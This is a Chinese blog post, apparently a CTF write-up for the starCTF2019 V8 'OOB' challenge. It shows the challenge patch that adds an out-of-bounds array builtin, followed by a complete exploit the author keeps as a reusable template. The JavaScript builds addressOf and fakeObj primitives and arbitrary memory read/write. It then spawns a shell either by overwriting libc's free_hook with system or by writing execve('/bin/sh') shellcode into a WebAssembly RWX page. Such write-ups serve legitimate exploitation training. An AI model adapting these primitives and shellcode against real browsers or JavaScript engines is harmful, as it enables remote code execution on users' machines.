【v8漏洞利用模板】starCTF2019 -- OOB

发布时间:2024年01月07日

前言

一道入门级别的 v8 题目,不涉及太多的 v8 知识,很适合入门,对于这个题目,网上已经有很多分析文章,笔者不再为大家制造垃圾,仅仅记录一个模板,方便以后使用

参考

从一道CTF题零基础学V8漏洞利用

题目环境配置

关于 v8 的环境配置见笔者之前的文章,这里题目给了 diff 文件。我们需要回滚代码到指定版本,然后将 diffapply 进去,最后就是正常的编译流程:

git reset --hard 6dc88c191f5ecc5389dc26efa3ca0907faef3598
git apply oob.diff
gclient sync -D # 别忘了 gclient sync 同步一下

漏洞分析

diff --git a/src/bootstrapper.cc b/src/bootstrapper.cc
index b027d36..ef1002f 100644
--- a/src/bootstrapper.cc
+++ b/src/bootstrapper.cc
@@ -1668,6 +1668,8 @@ void Genesis::InitializeGlobal(Handle<JSGlobalObject> global_object,
                           Builtins::kArrayPrototypeCopyWithin, 2, false);
     SimpleInstallFunction(isolate_, proto, "fill",
                           Builtins::kArrayPrototypeFill, 1, false);
+    SimpleInstallFunction(isolate_, proto, "oob",
+                          Builtins::kArrayOob,2,false);
     SimpleInstallFunction(isolate_, proto, "find",
                           Builtins::kArrayPrototypeFind, 1, false);
     SimpleInstallFunction(isolate_, proto, "findIndex",
diff --git a/src/builtins/builtins-array.cc b/src/builtins/builtins-array.cc
index 8df340e..9b828ab 100644
--- a/src/builtins/builtins-array.cc
+++ b/src/builtins/builtins-array.cc
@@ -361,6 +361,27 @@ V8_WARN_UNUSED_RESULT Object GenericArrayPush(Isolate* isolate,
   return *final_length;
 }
 }  // namespace
+BUILTIN(ArrayOob){
+    uint32_t len = args.length();
+    if(len > 2) return ReadOnlyRoots(isolate).undefined_value();
+    Handle<JSReceiver> receiver;
+    ASSIGN_RETURN_FAILURE_ON_EXCEPTION(
+            isolate, receiver, Object::ToObject(isolate, args.receiver()));
+    Handle<JSArray> array = Handle<JSArray>::cast(receiver);
+    FixedDoubleArray elements = FixedDoubleArray::cast(array->elements());
+    uint32_t length = static_cast<uint32_t>(array->length()->Number());
+    if(len == 1){
+        //read
+        return *(isolate->factory()->NewNumber(elements.get_scalar(length)));
+    }else{
+        //write
+        Handle<Object> value;
+        ASSIGN_RETURN_FAILURE_ON_EXCEPTION(
+                isolate, value, Object::ToNumber(isolate, args.at<Object>(1)));
+        elements.set(length,value->Number());
+        return ReadOnlyRoots(isolate).undefined_value();
+    }
+}
 
 BUILTIN(ArrayPush) {
   HandleScope scope(isolate);
diff --git a/src/builtins/builtins-definitions.h b/src/builtins/builtins-definitions.h
index 0447230..f113a81 100644
--- a/src/builtins/builtins-definitions.h
+++ b/src/builtins/builtins-definitions.h
@@ -368,6 +368,7 @@ namespace internal {
   TFJ(ArrayPrototypeFlat, SharedFunctionInfo::kDontAdaptArgumentsSentinel)     \
   /* https://tc39.github.io/proposal-flatMap/#sec-Array.prototype.flatMap */   \
   TFJ(ArrayPrototypeFlatMap, SharedFunctionInfo::kDontAdaptArgumentsSentinel)  \
+  CPP(ArrayOob)                                                                \
                                                                                \
   /* ArrayBuffer */                                                            \
   /* ES #sec-arraybuffer-constructor */                                        \
diff --git a/src/compiler/typer.cc b/src/compiler/typer.cc
index ed1e4a5..c199e3a 100644
--- a/src/compiler/typer.cc
+++ b/src/compiler/typer.cc
@@ -1680,6 +1680,8 @@ Type Typer::Visitor::JSCallTyper(Type fun, Typer* t) {
       return Type::Receiver();
     case Builtins::kArrayUnshift:
       return t->cache_->kPositiveSafeInteger;
+    case Builtins::kArrayOob:
+      return Type::Receiver();
 
     // ArrayBuffer functions.
     case Builtins::kArrayBufferIsView:

可以看到,这里将元素当作 Double 类型的数组

 FixedDoubleArray elements = FixedDoubleArray::cast(array->elements());

然后作者给了一些注释,连猜带懵可以知道这里存在数组越界,具体将上面给出的参考文章。

贴个 exp

let debug = (o) => {
        %DebugPrint(o);
        %SystemBreak();
}

let hexx = (str, num) => {
        print("\033[32m"+str+":\033[0m 0x"+num.toString(16));
}

var raw_buf = new ArrayBuffer(8);
var d = new Float64Array(raw_buf);
var l = new BigUint64Array(raw_buf);

function d2l(num)
{
        d[0] = num;
        return l[0];
}

function l2d(num)
{
        l[0] = num;
        return d[0];
}

var tmp = [1, 2];
var float_arr = [1.1, 1.2]
var obj_arr = [tmp, float_arr]

var float_map = d2l(float_arr.oob());
var obj_map = d2l(obj_arr.oob());

hexx("float_map", float_map);
hexx("obj_map", obj_map);

function addressOf(obj)
{
        obj_arr[0] = obj;
        obj_arr.oob(l2d(float_map));
        let obj_addr = d2l(obj_arr[0]) - 1n;
        obj_arr.oob(l2d(obj_map));
        return obj_addr;
}

function fakeObj(addr)
{
        float_arr[0] = l2d(addr+1n);
        float_arr.oob(l2d(obj_map));
        let fake_obj = float_arr[0];
        float_arr.oob(l2d(float_map));
        return fake_obj;
}

var fake_obj_arr = [l2d(float_map), 0, 52.1, l2d(0x200000000n)];

var fake_obj_arr_addr = addressOf(fake_obj_arr);
var fake_obj_addr = fake_obj_arr_addr - 0x20n;
hexx("fake_obj_arr_addr", fake_obj_arr_addr);
hexx("fake_obj_addr", fake_obj_addr);

var fake_obj = fakeObj(fake_obj_addr);

function arb_read(addr)
{
        fake_obj_arr[2] = l2d(addr+1n-0x10n);
        return d2l(fake_obj[0]) - 1n;
}

function arb_write_fake(addr, value)
{
        fake_obj_arr[2] = l2d(addr+1n-0x10n);
        fake_obj[0] = l2d(value);
}

var tmp_buf = new ArrayBuffer(0x20);
var arb_write_buf = new DataView(tmp_buf);
var arb_write_buf_addr = addressOf(arb_write_buf);
var arb_write_buf_buf_addr = arb_read(arb_write_buf_addr+0x18n);
var backing_store_addr = arb_write_buf_buf_addr+0x20n;
var backing_store = arb_read(arb_write_buf_buf_addr+0x20n);
hexx("arb_write_buf_addr", arb_write_buf_addr);
hexx("arb_write_buf_buf_addr", arb_write_buf_buf_addr);
hexx("backing_store_addr", backing_store_addr);
hexx("backing_store", backing_store);


let exp_hook = () => {

        function get_shell(){
                var shell_str = new String("/bin/sh\0");
        }

        var tmp_addr = addressOf(tmp);
        var tmp_map = arb_read(tmp_addr);
        var tmp_construct_addr = arb_read(tmp_map+0x20n);
        var tmp_code_addr = arb_read(tmp_construct_addr+0x30n);
        var text_addr = arb_read(tmp_code_addr+0x2n+0x40n) + 1n;
        var text_base = text_addr - 0x94f780n;
        var malloc_got = text_base + 0x12AA9E0n - 0x679000n;
        var libc_base = arb_read(malloc_got) + 1n - 0x780e0n;
        var system = libc_base + 0x30290n;
        var free_hook = libc_base + 0x1cce48n;
        hexx("tmp_addr", tmp_addr);
        hexx("tmp_map", tmp_map);
        hexx("tmp_construct_addr", tmp_construct_addr);
        hexx("tmp_code_addr", tmp_code_addr);
        hexx("text_addr", text_addr);
        hexx("text_base", text_base);
        hexx("malloc_got", malloc_got);
        hexx("libc_base", libc_base);
        hexx("system_addr", system);
        hexx("free_hook", free_hook);
        arb_write_fake(backing_store_addr, free_hook);
        arb_write_buf.setFloat64(0, l2d(system), true);
        //arb_write_fake(backing_store_addr, backing_store);
        //arb_write_buf.setFloat64(0, l2d(0x68732f6e69622fn), true);
        get_shell();
}

let exp_wasm = () => {

        var wasm_code = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,
                                        128,0,1,96,0,1,127,3,130,128,128,128,
                                        0,1,0,4,132,128,128,128,0,1,112,0,0,5,
                                        131,128,128,128,0,1,0,1,6,129,128,128,128,
                                        0,0,7,145,128,128,128,0,2,6,109,101,109,111,
                                        114,121,2,0,4,109,97,105,110,0,0,10,142,128,128,
                                        128,0,1,136,128,128,128,0,0,65,239,253,182,245,125,11]);

        var wasm_module = new WebAssembly.Module(wasm_code);
        var wasm_instance = new WebAssembly.Instance(wasm_module);
        var func = wasm_instance.exports.main;
        var wasm_instance_addr = addressOf(wasm_instance);
        var func_addr = addressOf(func);
        var rwx_addr = arb_read(wasm_instance_addr+0x88n) + 1n;
        hexx("func_addr", func_addr);
        hexx("wasm_instance_addr", wasm_instance_addr);
        hexx("rwx_addr", rwx_addr);

        var shellcode = [
          0x2fbb485299583b6an,
          0x5368732f6e69622fn,
          0x050f5e5457525f54n
        ];


        arb_write_fake(backing_store_addr, rwx_addr);
        for (let i = 0; i < shellcode.length; i++)
        {
                arb_write_buf.setFloat64(i*8, l2d(shellcode[i]), true);
        }
        func();
}
exp_hook();
//exp_wasm();
//debug(tmp);

效果如下:
劫持 wasmshellcode
在这里插入图片描述
劫持 free_hook
在这里插入图片描述

文章来源:https://blog.csdn.net/qq_61670993/article/details/135316299
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。